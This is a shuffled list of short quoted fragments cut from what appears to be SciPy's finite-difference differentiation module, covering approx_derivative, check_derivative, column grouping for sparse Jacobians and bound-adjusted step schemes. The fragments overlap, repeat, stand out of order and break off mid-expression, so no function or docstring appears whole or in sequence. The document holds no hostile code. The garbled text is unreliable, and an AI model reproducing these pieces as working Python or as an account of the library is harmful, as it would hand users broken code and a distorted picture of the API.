Parameters", "'2-point', 'cs'}, optional Finite difference method to use: - '2-point'", "derivatives. Float will be converted to 1-D array. bounds :", "column indices in the full array. j = cols[j] elif", "(n,) Point at which we wish to estimate derivative. h", "of int, shape (n,) Contains values from 0 to n_groups-1,", "-3.0 * f0 + 4 * f1 - f2 elif", "x0 + h_vecs[i] x2 = x0 + 2 * h_vecs[i]", "cols, = np.nonzero(e) i, j, _ = find(structure[:, cols]) j", "evaluation [3]_. To perform such economic computations two ingredients are", "x0.shape or ub.shape != x0.shape: raise ValueError(\"Inconsistent shapes between bounds", "np.array_equal(p, np.zeros_like(p)): return np.zeros(m) dx = h / norm(p) x", "+ 2 * h) or f(x0 - 2 * h)", "kwargs=kwargs) J_to_test = csr_matrix(J_to_test) abs_err = J_to_test - J_diff i,", "if scheme == '1-sided': use_one_sided = np.ones_like(h, dtype=bool) elif scheme", "<= np.maximum(lower_dist, upper_dist) h_adjusted[violated & fitting] *= -1 forward =", "x0 + h_vec dx = x - x0 df =", "the same for all variables. Use it to limit the", "jac, x0, args=(1, 2)) 2.4492935982947064e-16 \"\"\" J_to_test = jac(x0, *args,", "of a group to which ith column assigned. The procedure", "a scalar even if n=1). It must return 1-D array_like", "or '2-sided'.\") if np.all((lb == -np.inf) & (ub == np.inf)):", "least one of them has zero. A greedy sequential algorithm", "not provided, it assigned to ``EPS**(1/s)``, where EPS is machine", "ndarray with shape (m, n) is returned. If `sparsity` is", "called. Default is None. bounds : tuple of array_like, optional", "kwargs={}): \"\"\"Compute finite difference approximation of the derivatives of a", "x[1]), ... x[0] * np.cos(c2 * x[1])]) ... >>> def", "cols]) j = cols[j] mask = use_one_sided[j] df = np.empty(m)", "order=0): \"\"\"Group columns of a 2-D matrix for sparse finite", "the matrix. By default `as_linear_operator` is False. args, kwargs :", "Jacobian, where an element (i, j) is a partial derivative", "2-D Jacobian with correct dimensions. References ---------- .. [1] W.", "* f0[rows] + 4 * f1[rows] - f2[rows] rows =", "f0, h, use_one_sided, structure, groups, method) def _linear_operator_difference(fun, x0, f0,", "default `as_linear_operator` is False. args, kwargs : tuple and dict,", "np.array([1.0, 0.5 * np.pi]) >>> approx_derivative(f, x0, args=(1, 2)) array([[", "\"`as_linear_operator` is True.\") def fun_wrapped(x): f = np.atleast_1d(fun(x, *args, **kwargs))", "dx*p df = fun(x) - f0 return df / dx", "of which to estimate the derivatives. The argument x passed", "Jacobian matrices where each row contains few non-zero elements. as_linear_operator", "is not None returns a csr_matrix with shape (m, n).", "= np.abs(h_total) <= np.maximum(lower_dist, upper_dist) h_adjusted[violated & fitting] *= -1", "(n,) Upper bounds on independent variables. Returns ------- h_adjusted :", "dict, optional Additional arguments passed to `fun`. Both empty by", "ub): \"\"\"Adjust final difference scheme to the presence of bounds.", "If int or None, a random permutation is used with", "dx[j]) row_indices = np.hstack(row_indices) col_indices = np.hstack(col_indices) fractions = np.hstack(fractions)", "- x1[i] f1 = fun(x1) f2 = fun(x2) df =", "np.all((lb == -np.inf) & (ub == np.inf)): return h, use_one_sided", "= h_vec cols, = np.nonzero(e) i, j, _ = find(structure[:,", "shape (m,) or a scalar. x0 : array_like of shape", "h_adjusted[violated & fitting] *= -1 forward = (upper_dist >= lower_dist)", "be analytically continued to the complex plane. Otherwise, produces bogus", "= [] n_groups = np.max(groups) + 1 for group in", "dict, optional Additional arguments passed to `fun` and `jac`. Both", "lower_dist) & ~central h_adjusted[forward] = np.minimum( h[forward], 0.5 * upper_dist[forward]", "h, use_one_sided, structure, groups, method): m = f0.size n =", "method) def _linear_operator_difference(fun, x0, f0, h, method): m = f0.size", "first order accuracy forward or backward difference. - '3-point' -", "np.nonzero(e) # Find all non-zero elements in selected columns of", "computing derivatives (Jacobian or gradient) by comparison with a finite", "to fit into the bounds. For ``method='3-point'`` the sign of", "else: order = np.asarray(order) if order.shape != (n,): raise ValueError(\"`order`", "numpy as np from numpy.linalg import norm from scipy.sparse.linalg import", "np.atleast_2d(structure) groups = np.atleast_1d(groups) return _sparse_difference(fun_wrapped, x0, f0, h, use_one_sided,", "scalar. x0 : array_like of shape (n,) or float Point", "== '2-sided': central = (lower_dist >= h_total) & (upper_dist >=", "backward schemes, '2-sided' applies to center schemes. lb : ndarray,", "'3-point': h, use_one_sided = _adjust_scheme_to_bounds( x0, h, 1, '2-sided', lb,", "variables. Use it to limit the range of function evaluation.", "the range of function evaluation. args, kwargs : tuple and", "return np.array([x[0] * np.sin(c1 * x[1]), ... x[0] * np.cos(c2", "def fun_wrapped(x): f = np.atleast_1d(fun(x, *args, **kwargs)) if f.ndim >", "m = f0.size n = x0.size row_indices = [] col_indices", "the derivatives. Float will be converted to 1-D array. bounds", "* np.maximum(1.0, np.abs(x0)) def _prepare_bounds(bounds, x0): lb, ub = [np.asarray(b,", "float Point at which to estimate the derivatives. Float will", "1, '2-sided', lb, ub) elif method == 'cs': use_one_sided =", "absolute values higher than 1 and absolute errors for elements", "EPS**0.5} def _compute_absolute_step(rel_step, x0, method): if rel_step is None: rel_step", "args=args, kwargs=kwargs) J_to_test = csr_matrix(J_to_test) abs_err = J_to_test - J_diff", "x2[i] - x1[i] f1 = fun(x1) f2 = fun(x2) df", "provided, it assigned to ``EPS**(1/s)``, where EPS is machine epsilon", "# All that's left is to compute the fraction. We", "grouping for a given sparsity structure, use `group_columns` to obtain", "derivatives. The argument x passed to this function is ndarray", "not allow direct access to individual elements of the matrix.", "x[0] * np.cos(c2 * x[1])]) ... >>> x0 = np.array([1.0,", "and 3-point forward or backward scheme is used for points", "num_steps elif scheme == '2-sided': central = (lower_dist >= h_total)", "csr_matrix(J) def check_derivative(fun, jac, x0, bounds=(-np.inf, np.inf), args=(), kwargs={}): \"\"\"Check", "== '3-point': def matvec(p): if np.array_equal(p, np.zeros_like(p)): return np.zeros(m) dx", "required. In other words '1-sided' applies to forward and backward", "array with shape (n,). See Also -------- check_derivative : Check", "(n,) or float Point at which to estimate the derivatives.", "* h_vec[mask_1] mask_2 = ~use_one_sided & e x1[mask_2] -= h_vec[mask_2]", "are required: * structure : array_like or sparse matrix of", "in terms of Taylor expansion. Refer to [2]_ for the", "use_one_sided, structure, groups, method) def _linear_operator_difference(fun, x0, f0, h, method):", "f2 = fun(x2) cols, = np.nonzero(e) i, j, _ =", "is selected automatically. The well-known central difference scheme is used", "cols, = np.nonzero(e) # Find all non-zero elements in selected", "+ h_vec*1.j) df = f1.imag dx = h_vec cols, =", "[np.cos(c2 * x[1]), -c2 * x[0] * np.sin(c2 * x[1])]", "variables. cols, = np.nonzero(e) # Find all non-zero elements in", "- x0 df = fun(x) - f0 # The result", "np.inf), sparsity=None, as_linear_operator=False, args=(), kwargs={}): \"\"\"Compute finite difference approximation of", "W. H. Press et. al. \"Numerical Recipes. The Art of", "np.cos(c2 * x[1])]) ... >>> x0 = np.array([1.0, 0.5 *", "values higher than 1 and absolute errors for elements with", "Informative only for ``scheme='2-sided'``. \"\"\" if scheme == '1-sided': use_one_sided", "= np.abs(h) use_one_sided = np.zeros_like(h, dtype=bool) else: raise ValueError(\"`scheme` must", "fractions = np.hstack(fractions) J = coo_matrix((fractions, (row_indices, col_indices)), shape=(m, n))", "1. If `accuracy` is on the order of 1e-6 or", "*= -1 forward = (upper_dist >= lower_dist) & ~fitting h_adjusted[forward]", "numbers, s=2 for '2-point' method and s=3 for '3-point' method.", "of a vector-valued function. If a function maps from R^n", "well-known central difference scheme is used for points sufficiently far", "not in ['2-point', '3-point', 'cs']: raise ValueError(\"Unknown method '%s'. \"", "array. j = cols[j] elif method == '3-point': # Here", "= np.atleast_1d(f0) if f0.ndim > 1: raise ValueError(\"`f0` passed has", "`sparsity` is not None returns a csr_matrix with shape (m,", "expansion. Refer to [2]_ for the formulas of 3-point forward", "or np.isscalar(order): rng = np.random.RandomState(order) order = rng.permutation(n) else: order", "norm(p) x1 = x0 - (dx/2)*p x2 = x0 +", "= fun(x2) cols, = np.nonzero(e) i, j, _ = find(structure[:,", "is use a random permutation but guarantee repeatability. Returns -------", "The maximum among all relative errors for elements with absolute", "use_one_sided = np.ones_like(h, dtype=bool) elif scheme == '2-sided': h =", "optional Additional arguments passed to `fun` and `jac`. Both empty", "else: J_diff = approx_derivative(fun, x0, bounds=bounds, args=args, kwargs=kwargs) abs_err =", "- f1 elif method == 'cs': f1 = fun(x0 +", "3-point forward and backward difference schemes. For dense differencing when", "* upper_dist[forward] / num_steps) use_one_sided[forward] = True backward = (upper_dist", "group_sparse EPS = np.finfo(np.float64).eps def _adjust_scheme_to_bounds(x0, h, num_steps, scheme, lb,", "1.0 >>> approx_derivative(g, x0, bounds=(-np.inf, 1.0)) array([ 1.]) >>> approx_derivative(g,", "or None, a random permutation is used with `order` used", "exactly representable number. df = fun(x) - f0 elif method", "if rel_step is None: rel_step = relative_step[method] sign_x0 = (x0", "to take a full step. use_one_sided : ndarray of bool,", "of Scientific Computing. 3rd edition\", sec. 5.7. .. [2] <NAME>,", "case the bound will be the same for all variables.", "of function evaluation. In the example below we compute left", "check_derivative(f, jac, x0, args=(1, 2)) 2.4492935982947064e-16 \"\"\" J_to_test = jac(x0,", "np.cos(c2 * x[1])]) ... >>> def jac(x, c1, c2): ...", "raise ValueError(\"`f0` passed has more than 1 dimension.\") if np.any((x0", "import approx_derivative >>> >>> def f(x, c1, c2): ... return", "m, n = A.shape if order is None or np.isscalar(order):", "np.pi]) >>> approx_derivative(f, x0, args=(1, 2)) array([[ 1., 0.], [-1.,", "difference. - '3-point' - use central difference in interior points", "* sign_x0 * np.maximum(1.0, np.abs(x0)) def _prepare_bounds(bounds, x0): lb, ub", "the first order accuracy forward or backward difference. - '3-point'", "array([ 1.]) >>> approx_derivative(g, x0, bounds=(1.0, np.inf)) array([ 2.]) \"\"\"", "i[~mask] df[rows] = f2[rows] - f1[rows] elif method == 'cs':", "All that's left is to compute the fraction. We store", "in the latter case the bound will be the same", "row at least one of them has zero. A greedy", "+= 2 * h_vec[mask_1] mask_2 = ~use_one_sided & e x1[mask_2]", "separate one-sided # and two-sided schemes. x1 = x0.copy() x2", "df = fun(x) - f0 return df / dx elif", "= (x < lb) | (x > ub) fitting =", "- '2-point' - use the first order accuracy forward or", "of columns enumeration. If int or None, a random permutation", "rng.permutation(n) else: order = np.asarray(order) if order.shape != (n,): raise", "required: * structure : array_like or sparse matrix of shape", "non-zero elements in selected columns of Jacobian. i, j, _", "in the same group simultaneously. e = np.equal(group, groups) h_vec", "random permutation is used with `order` used as a random", "/ num_steps) use_one_sided[forward] = True backward = (upper_dist < lower_dist)", "lb, ub def group_columns(A, order=0): \"\"\"Group columns of a 2-D", "!= 0).astype(np.int32) if A.ndim != 2: raise ValueError(\"`A` must be", "x0 + dx*p df = fun(x) - f0 return df", "*args, **kwargs)`` and the same for `jac`. Returns ------- accuracy", "is returned. If `sparsity` is not None returns a csr_matrix", "117-120. \"\"\" if issparse(A): A = csc_matrix(A) else: A =", "np.equal(group, groups) h_vec = h * e if method ==", "np.inf), args=(), kwargs={}): \"\"\"Check correctness of a function computing derivatives", "analytically continued to the complex plane. Otherwise, produces bogus results.", "only if a sign flip or switching to one-sided scheme", "is None: f0 = fun_wrapped(x0) else: f0 = np.atleast_1d(f0) if", "csc_matrix(structure) else: structure = np.atleast_2d(structure) groups = np.atleast_1d(groups) return _sparse_difference(fun_wrapped,", "np.atleast_1d(f0) if f0.ndim > 1: raise ValueError(\"`f0` passed has more", "clearly separates these two different cases. b) In all cases", "raise RuntimeError(\"Never be here.\") J_transposed[i] = df / dx if", "for i in range(h.size): if method == '2-point': x =", "estimate the derivatives. Float will be converted to 1-D array.", "= (upper_dist < lower_dist) & ~central h_adjusted[backward] = -np.minimum( h[backward],", "callable Function of which to estimate the derivatives. The argument", "`x0`.\") if as_linear_operator and not (np.all(np.isinf(lb)) and np.all(np.isinf(ub))): raise ValueError(\"Bounds", "and dict, optional Additional arguments passed to `fun` and `jac`.", "= (upper_dist < lower_dist) & ~fitting h_adjusted[backward] = -lower_dist[backward] /", "identically equals to zero. * groups : array_like of shape", "* np.cos(c2 * x[1])]) ... >>> def jac(x, c1, c2):", "adjusted_central = (~central & (np.abs(h_adjusted) <= min_dist)) h_adjusted[adjusted_central] = min_dist[adjusted_central]", "x[1]), -c2 * x[0] * np.sin(c2 * x[1])] ... ])", "A column grouping for a given sparsity structure, use `group_columns`", "e x1[mask_2] -= h_vec[mask_2] x2[mask_2] += h_vec[mask_2] dx = np.zeros(n)", "- use the first order accuracy forward or backward difference.", "elif method == '3-point': # Here we do conceptually the", "defined. If `sparsity` is None then a ndarray with shape", "approximation. Parameters ---------- fun : callable Function of which to", "= i[~mask] df[rows] = f2[rows] - f1[rows] elif method ==", "cols[j] else: raise ValueError(\"Never be here.\") # All that's left", "= fun(x) df = f1.imag return df / dx else:", "h, use_one_sided, method): m = f0.size n = x0.size J_transposed", "bounds=(1.0, np.inf)) array([ 2.]) \"\"\" if method not in ['2-point',", "use: - '2-point' - use the first order accuracy forward", "The absolute step size is computed as ``h = rel_step", "correspond to perturbed # variables. cols, = np.nonzero(e) # Find", "a dense array or sparse matrix depending on how `sparsity`", "dx elif method == '3-point': def matvec(p): if np.array_equal(p, np.zeros_like(p)):", "we wish to estimate derivative. h : ndarray, shape (n,)", "h_adjusted[forward] = upper_dist[forward] / num_steps backward = (upper_dist < lower_dist)", "get 2-D Jacobian with correct dimensions. References ---------- .. [1]", "where EPS is machine epsilon for float64 numbers, s=2 for", "j = cols[j] else: raise ValueError(\"Never be here.\") # All", ">>> >>> >>> def f(x, c1, c2): ... return np.array([x[0]", "values from 0 to n_groups-1, where n_groups is the number", "ndarray, shape (n,) Upper bounds on independent variables. Returns -------", "Upper bounds on independent variables. Returns ------- h_adjusted : ndarray,", "# Find all non-zero elements in selected columns of Jacobian.", "few non-zero elements. as_linear_operator : bool, optional When True the", "with shape (m, n) is returned. If `sparsity` is not", "Point at which we wish to estimate derivative. h :", "shape (n,) Contains values from 0 to n_groups-1, where n_groups", "* x[1]), c1 * x[0] * np.cos(c1 * x[1])], ...", "be used. Note, that sparse differencing makes sense only for", "True min_dist = np.minimum(upper_dist, lower_dist) / num_steps adjusted_central = (~central", "order = rng.permutation(n) else: order = np.asarray(order) if order.shape !=", "with a finite difference approximation. Parameters ---------- fun : callable", "a finite difference approximation. Parameters ---------- fun : callable Function", "... [np.sin(c1 * x[1]), c1 * x[0] * np.cos(c1 *", "col_indices.append(j) fractions.append(df[i] / dx[j]) row_indices = np.hstack(row_indices) col_indices = np.hstack(col_indices)", "simultaneously. e = np.equal(group, groups) h_vec = h * e", "errors for elements with absolute values higher than 1 and", "h_vecs[i] dx = x2[i] - x0[i] f1 = fun(x1) f2", "n_groups-1, where n_groups is the number of found groups. Each", "to get 2-D Jacobian with correct dimensions. References ---------- ..", "approximately minimizes a sum of truncation and round-off errors, see", "to be equal to ``fun(x0)``, in this case the ``fun(x0)``", "abs_err_data = find(abs_err) J_diff_data = np.asarray(J_diff[i, j]).ravel() return np.max(np.abs(abs_err_data) /", "np.max(np.abs(abs_err_data) / np.maximum(1, np.abs(J_diff_data))) else: J_diff = approx_derivative(fun, x0, bounds=bounds,", ": float The maximum among all relative errors for elements", "e x1[mask_1] += h_vec[mask_1] x2[mask_1] += 2 * h_vec[mask_1] mask_2", "(dx/2)*p x2 = x0 + (dx/2)*p f1 = fun(x1) f2", "<= min_dist)) h_adjusted[adjusted_central] = min_dist[adjusted_central] use_one_sided[adjusted_central] = False return h_adjusted,", "n, A) groups[order] = groups.copy() return groups def approx_derivative(fun, x0,", "True returns a LinearOperator with shape (m, n). Otherwise it", "= f2 - f1 return df / dx elif method", "= A.shape if order is None or np.isscalar(order): rng =", "relative step approximately minimizes a sum of truncation and round-off", "117-120. .. [3] <NAME>, \"Generation of Finite Difference Formulas on", "sparse matrix, LinearOperator} Finite difference approximation of the Jacobian matrix.", "that the user function is real-valued and can be analytically", "- use central difference in interior points and the second", "of the Institute of Mathematics and its Applications, 13 (1974),", "returns an `scipy.sparse.linalg.LinearOperator`. Otherwise it returns a dense array or", "f(x, c1, c2): ... return np.array([x[0] * np.sin(c1 * x[1]),", "but does not allow direct access to individual elements of", ">>> approx_derivative(g, x0, bounds=(-np.inf, 1.0)) array([ 1.]) >>> approx_derivative(g, x0,", "makes sense only for large Jacobian matrices where each row", "of which to group columns. order : int, iterable of", "sparsity=None, as_linear_operator=False, args=(), kwargs={}): \"\"\"Compute finite difference approximation of the", "not None returns a csr_matrix with shape (m, n). For", "group simultaneously. e = np.equal(group, groups) h_vec = h *", "on independent variables. Defaults to no bounds. Each bound must", "ingredients are required: * structure : array_like or sparse matrix", "_ = find(structure[:, cols]) j = cols[j] else: raise ValueError(\"Never", "function is real-valued and can be analytically continued to the", "= fun(x0 + h_vecs[i]*1.j) df = f1.imag dx = h_vecs[i,", "independent variables. Defaults to no bounds. Each bound must match", "of the Jacobian matrix. If `as_linear_operator` is True returns a", "Function which computes Jacobian matrix of `fun`. It must work", "method == '3-point': # Here we do conceptually the same", "shape=(m, n)) return csr_matrix(J) def check_derivative(fun, jac, x0, bounds=(-np.inf, np.inf),", "2-tuple}, optional Defines a sparsity structure of the Jacobian matrix.", "or sparse matrix with an appropriate shape. x0 : array_like", ">>> import numpy as np >>> from scipy.optimize import check_derivative", "structure, groups, method) def _linear_operator_difference(fun, x0, f0, h, method): m", "np.asarray(order) if order.shape != (n,): raise ValueError(\"`order` has incorrect shape.\")", "(m, n). Otherwise it returns a dense array or sparse", "array([ 2.]) \"\"\" if method not in ['2-point', '3-point', 'cs']:", "correct. See Also -------- approx_derivative : Compute finite difference approximation", "and absolute errors for elements with absolute values less or", "as ``h = rel_step * sign(x0) * max(1, abs(x0))``, possibly", "< lower_dist) & ~fitting h_adjusted[backward] = -lower_dist[backward] / num_steps elif", "the number of found groups. Each value ``groups[i]`` is an", "else: A = np.atleast_2d(A) A = (A != 0).astype(np.int32) if", "access to individual elements of the matrix. By default `as_linear_operator`", "raise ValueError(\"`x0` violates bound constraints.\") if as_linear_operator: if rel_step is", "`order` used as a random seed. Default is 0, that", "values less or equal than 1. If `accuracy` is on", "Jacobian matrix. If `as_linear_operator` is True returns a LinearOperator with", "user function is real-valued and can be analytically continued to", "is defined. If `sparsity` is None then a ndarray with", "if ub.ndim == 0: ub = np.resize(ub, x0.shape) return lb,", "do conceptually the same but separate one-sided # and two-sided", "the Jacobian identically equals to zero. * groups : array_like", "& e x1[mask_2] -= h_vec[mask_2] x2[mask_2] += h_vec[mask_2] dx =", "the ``fun(x0)`` is not called. Default is None. bounds :", "\" \"more than 1 dimension.\") return f if f0 is", "array([[ 1., 0.], [-1., 0.]]) Bounds can be used to", "See Also -------- check_derivative : Check correctness of a function", "= [] fractions = [] n_groups = np.max(groups) + 1", "the sign of `h` is ignored. If None (default) then", "use central difference in interior points and the second order", "else: raise RuntimeError(\"Never be here.\") return LinearOperator((m, n), matvec) def", "different cases. b) In all cases np.atleast_2d can be called", "not use_one_sided[i]: x1 = x0 - h_vecs[i] x2 = x0", "tuple of array_like, optional Lower and upper bounds on independent", "directions are required. In other words '1-sided' applies to forward", "x**2 if x >= 1 else x ... >>> x0", "x0.copy() x2 = x0.copy() mask_1 = use_one_sided & e x1[mask_1]", "int with shape (n,) or None Permutation array which defines", "equal than 1. If `accuracy` is on the order of", "columns by a single function evaluation [3]_. To perform such", "x0 - lb upper_dist = ub - x0 if scheme", "when `as_linear_operator` is True. sparsity : {None, array_like, sparse matrix,", "h_adjusted[backward] = -lower_dist[backward] / num_steps elif scheme == '2-sided': central", "all cases np.atleast_2d can be called to get 2-D Jacobian", "used as a random seed. Default is 0, that is", "as a random seed. Default is 0, that is use", "x0, method): if rel_step is None: rel_step = relative_step[method] sign_x0", "of int with shape (n,) or None Permutation array which", "implement finite difference scheme. For example, 2 means that we", "... >>> x0 = 1.0 >>> approx_derivative(g, x0, bounds=(-np.inf, 1.0))", "on `sparsity`. The linear operator provides an efficient way of", "produces bogus results. rel_step : None or array_like, optional Relative", "= True min_dist = np.minimum(upper_dist, lower_dist) / num_steps adjusted_central =", "int or None, a random permutation is used with `order`", "Use it to limit the range of function evaluation. Bounds", "def matvec(p): if np.array_equal(p, np.zeros_like(p)): return np.zeros(m) dx = h", "a sparsity structure, and groups are computed inside the function.", "is the number of found groups. Each value ``groups[i]`` is", "group_dense(m, n, A) groups[order] = groups.copy() return groups def approx_derivative(fun,", "x0 + dx*p*1.j f1 = fun(x) df = f1.imag return", "matrix, LinearOperator} Finite difference approximation of the Jacobian matrix. If", "Computation 51, 1988. Examples -------- >>> import numpy as np", "separates these two different cases. b) In all cases np.atleast_2d", "0.5 * upper_dist[forward] / num_steps) use_one_sided[forward] = True backward =", "schemes. lb : ndarray, shape (n,) Lower bounds on independent", "False. args, kwargs : tuple and dict, optional Additional arguments", "bounds=bounds, args=args, kwargs=kwargs) abs_err = np.abs(J_to_test - J_diff) return np.max(abs_err", "jac(x, c1, c2): ... return np.array([ ... [np.sin(c1 * x[1]),", "'1-sided': use_one_sided = np.ones_like(h, dtype=bool) elif scheme == '2-sided': h", "/ norm(p) x = x0 + dx*p df = fun(x)", "sparse matrix with an appropriate shape. x0 : array_like of", "= x2[mask_2] - x1[mask_2] f1 = fun(x1) f2 = fun(x2)", "\"\"\" if method not in ['2-point', '3-point', 'cs']: raise ValueError(\"Unknown", "method): if rel_step is None: rel_step = relative_step[method] sign_x0 =", "of Mathematics and its Applications, 13 (1974), pp. 117-120. ..", "\"more than 1 dimension.\") return f if f0 is None:", "Jacobian is returned with a shape (n,), on the other", "and dict, optional Additional arguments passed to `fun`. Both empty", "is significantly less than n. References ---------- .. [1] <NAME>,", ": callable Function of which to estimate the derivatives. The", "when \" \"`as_linear_operator` is True.\") def fun_wrapped(x): f = np.atleast_1d(fun(x,", "is returned with a shape (n,), on the other hand", "import division import numpy as np from numpy.linalg import norm", "Function of which to estimate the derivatives. The argument x", "'2-sided' applies to center schemes. lb : ndarray, shape (n,)", "[2] <NAME>, <NAME>, and <NAME>, \"On the estimation of sparse", "a 1-D gradient array with shape (n,). See Also --------", "then it is likely that your `jac` implementation is correct.", "x = x0 + h_vecs[i] dx = x[i] - x0[i]", "f0 elif method == '3-point' and use_one_sided[i]: x1 = x0", "n). A zero element means that a corresponding element of", "np.ones_like(h, dtype=bool) elif scheme == '2-sided': h = np.abs(h) use_one_sided", "0.], [-1., 0.]]) Bounds can be used to limit the", "= rng.permutation(n) else: order = np.asarray(order) if order.shape != (n,):", "x0, bounds=(-np.inf, 1.0)) array([ 1.]) >>> approx_derivative(g, x0, bounds=(1.0, np.inf))", "if method == '2-point': x = x0 + h_vecs[i] dx", "implemented when `as_linear_operator` is True. sparsity : {None, array_like, sparse", "x2 = x0.copy() mask_1 = use_one_sided & e x1[mask_1] +=", "{ndarray, sparse matrix, LinearOperator} Finite difference approximation of the Jacobian", "h_total = h * num_steps h_adjusted = h.copy() lower_dist =", "upper_dist) h_adjusted[violated & fitting] *= -1 forward = (upper_dist >=", "be called to get 2-D Jacobian with correct dimensions. References", "x0 = np.atleast_1d(x0) if x0.ndim > 1: raise ValueError(\"`x0` must", "~use_one_sided & e x1[mask_2] -= h_vec[mask_2] x2[mask_2] += h_vec[mask_2] dx", "must work with argument x the same way as `fun`.", "| (x > ub) fitting = np.abs(h_total) <= np.maximum(lower_dist, upper_dist)", "shape (n,) or None Permutation array which defines the order", "* x[1]), ... x[0] * np.cos(c2 * x[1])]) ... >>>", "fun(x1) f2 = fun(x2) df = f2 - f1 return", "\"\"\"Check correctness of a function computing derivatives (Jacobian or gradient)", "sparse matrix depending on `sparsity`. The linear operator provides an", "dx elif method == 'cs': def matvec(p): if np.array_equal(p, np.zeros_like(p)):", "/ dx elif method == 'cs': def matvec(p): if np.array_equal(p,", "'1-sided' or '2-sided'.\") if np.all((lb == -np.inf) & (ub ==", "ndarray, shape (n,) Point at which we wish to estimate", "x0 = 1.0 >>> approx_derivative(g, x0, bounds=(-np.inf, 1.0)) array([ 1.])", "2)) 2.4492935982947064e-16 \"\"\" J_to_test = jac(x0, *args, **kwargs) if issparse(J_to_test):", "which to estimate the derivatives. The argument x passed to", "(m=1) in a conventional way. b) It clearly separates these", "use_one_sided[i]: x1 = x0 + h_vecs[i] x2 = x0 +", "dx = x2[i] - x1[i] f1 = fun(x1) f2 =", "It must work with argument x the same way as", "= x0 + h_vecs[i] x2 = x0 + 2 *", "`as_linear_operator` is True. sparsity : {None, array_like, sparse matrix, 2-tuple},", "[] col_indices = [] fractions = [] n_groups = np.max(groups)", "If None (default) then step is selected automatically, see Notes.", "the formulas of 3-point forward and backward difference schemes. For", "approximation of the Jacobian matrix. If `as_linear_operator` is True returns", "EPS = np.finfo(np.float64).eps def _adjust_scheme_to_bounds(x0, h, num_steps, scheme, lb, ub):", "/ num_steps elif scheme == '2-sided': central = (lower_dist >=", "np.abs(J_diff_data))) else: J_diff = approx_derivative(fun, x0, bounds=bounds, args=args, kwargs=kwargs) abs_err", "= approx_derivative(fun, x0, bounds=bounds, sparsity=J_to_test, args=args, kwargs=kwargs) J_to_test = csr_matrix(J_to_test)", ": tuple and dict, optional Additional arguments passed to `fun`.", "estimate the derivatives. The argument x passed to this function", "x0 - h_vecs[i] x2 = x0 + h_vecs[i] dx =", "indices in the full array. j = cols[j] elif method", "'cs': use_one_sided = False if sparsity is None: return _dense_difference(fun_wrapped,", "or switching to one-sided scheme doesn't allow to take a", "use_one_sided, method) else: if not issparse(sparsity) and len(sparsity) == 2:", "LinearOperator} Finite difference approximation of the Jacobian matrix. If `as_linear_operator`", "range(n_groups): # Perturb variables which are in the same group", "bool, shape (n,) Whether to switch to one-sided scheme. Informative", "or f(x0 - 2 * h) scheme : {'1-sided', '2-sided'}", "np.maximum(1, np.abs(J_diff_data))) else: J_diff = approx_derivative(fun, x0, bounds=bounds, args=args, kwargs=kwargs)", "\"\"\" if scheme == '1-sided': use_one_sided = np.ones_like(h, dtype=bool) elif", "abs_err = np.abs(J_to_test - J_diff) return np.max(abs_err / np.maximum(1, np.abs(J_diff)))", "one-sided scheme doesn't allow to take a full step. use_one_sided", "_ = find(structure[:, cols]) # Restore column indices in the", "f0 = np.atleast_1d(f0) if f0.ndim > 1: raise ValueError(\"`f0` passed", "be converted to 1-D array. bounds : 2-tuple of array_like,", "(upper_dist < lower_dist) & ~central h_adjusted[backward] = -np.minimum( h[backward], 0.5", "`as_linear_operator` is False. args, kwargs : tuple and dict, optional", "fitting] *= -1 forward = (upper_dist >= lower_dist) & ~fitting", "df = f2 - f1 elif method == 'cs': f1", "central difference scheme is used for points sufficiently far from", "appropriate shape. x0 : array_like of shape (n,) or float", "bounds. Parameters ---------- x0 : ndarray, shape (n,) Point at", "assigned to ``EPS**(1/s)``, where EPS is machine epsilon for float64", "forward = (upper_dist >= lower_dist) & ~central h_adjusted[forward] = np.minimum(", "is used for points sufficiently far from the boundary, and", "None returns a csr_matrix with shape (m, n). For sparse", "method not in ['2-point', '3-point', 'cs']: raise ValueError(\"Unknown method '%s'.", "== '3-point' and use_one_sided[i]: x1 = x0 + h_vecs[i] x2", "np.array([x[0] * np.sin(c1 * x[1]), ... x[0] * np.cos(c2 *", "J_transposed[i] = df / dx if m == 1: J_transposed", "(x < lb) | (x > ub) fitting = np.abs(h_total)", "import norm from scipy.sparse.linalg import LinearOperator from ..sparse import issparse,", "function. A tuple is interpreted as (structure, groups). If None", "is interpreted as a sparsity structure, and groups are computed", "standard dense differencing will be used. Note, that sparse differencing", "np.minimum( h[forward], 0.5 * upper_dist[forward] / num_steps) use_one_sided[forward] = True", "= -3 * f0[rows] + 4 * f1[rows] - f2[rows]", "conventional way. b) It clearly separates these two different cases.", "method == '2-point': h, use_one_sided = _adjust_scheme_to_bounds( x0, h, 1,", "if np.array_equal(p, np.zeros_like(p)): return np.zeros(m) dx = 2*h / norm(p)", "+ 4 * f1 - f2 elif method == '3-point'", "for `jac`. Returns ------- accuracy : float The maximum among", "of Finite Difference Formulas on Arbitrarily Spaced Grids\", Mathematics of", "np.minimum(upper_dist, lower_dist) / num_steps adjusted_central = (~central & (np.abs(h_adjusted) <=", "1 for group in range(n_groups): # Perturb variables which are", "`h` is ignored. If None (default) then step is selected", "or sparse matrix of shape (m, n). A zero element", "division import numpy as np from numpy.linalg import norm from", "x0, bounds=(1.0, np.inf)) array([ 2.]) \"\"\" if method not in", "algorithm is used to construct groups. Parameters ---------- A :", "return np.zeros(m) dx = h / norm(p) x = x0", "`jac` implementation is correct. See Also -------- approx_derivative : Compute", "2 means that we need to evaluate f(x0 + 2", "= x0 - lb upper_dist = ub - x0 if", "fun(x) - f0 return df / dx elif method ==", "f1 = fun(x1) f2 = fun(x2) df = f2 -", "range(h.size): if method == '2-point': x = x0 + h_vecs[i]", ">>> >>> x0 = np.array([1.0, 0.5 * np.pi]) >>> check_derivative(f,", "optional Lower and upper bounds on independent variables. Defaults to", "= use_one_sided[j] df = np.empty(m) rows = i[mask] df[rows] =", "groups : ndarray of int, shape (n,) Contains values from", "- '3-point' - use central difference in interior points and", "computations two ingredients are required: * structure : array_like or", "the following: a) It handles a case of gradient computation", "order] if issparse(A): groups = group_sparse(m, n, A.indices, A.indptr) else:", "vector-valued function. If a function maps from R^n to R^m,", "df = -3.0 * f0 + 4 * f1 -", "must be array_like or sparse matrix with an appropriate shape.", "plane. Otherwise, produces bogus results. rel_step : None or array_like,", "np.any((x0 < lb) | (x0 > ub)): raise ValueError(\"`x0` violates", "the fraction. We store i, j and # fractions as", "ub.shape != x0.shape: raise ValueError(\"Inconsistent shapes between bounds and `x0`.\")", "f0.size n = x0.size J_transposed = np.empty((n, m)) h_vecs =", "be used to limit the region of function evaluation. In", "higher than 1 and absolute errors for elements with 